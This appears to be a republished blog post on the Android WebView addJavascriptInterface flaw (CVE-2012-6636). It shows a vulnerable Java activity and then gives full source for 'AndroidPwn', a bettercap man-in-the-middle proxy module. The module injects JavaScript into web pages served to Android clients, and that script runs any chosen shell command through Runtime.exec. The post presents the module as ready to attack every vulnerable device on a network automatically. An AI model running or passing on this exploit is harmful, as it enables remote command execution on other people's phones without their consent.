Vulnerability In Web View Put Android Device Vulnerable To "MITM" Attack

Vulnerability in webview allow each & every android device to perform mitm attack automatically
Unknown
Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.
hacked
There's an excellent post about this vulnerability, long story short, if there's an app which is using aWebView UI control and it's declaring a custom javascript interface for it like so:
public class WebViewGUI extends Activity {  
  WebView mWebView;
  public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    mWebView=new WebView(this);
    mWebView.getSettings().setJavaScriptEnabled(true);
    mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
    mWebView.loadUrl("file:///android_asset/www/index.html");
    setContentView(mWebView);
  }

  final class JavaScriptInterface {
    JavaScriptInterface () { }
    public String getSomeString() {
      return "string";
    }
  }
}
you can inject some special javascript into that page and make that device execute any shell command you want.
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module  
  @@command = nil
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              " try {\n" +
              "   top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
              "   break;\n" +
              " }\n" +
              "catch(e) {}\n" +
              "}\n" +
              "</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""

    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL    : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT  : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""

      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end  
As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go.
androidpwn
Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.
Source:Evilsocket

Post a Comment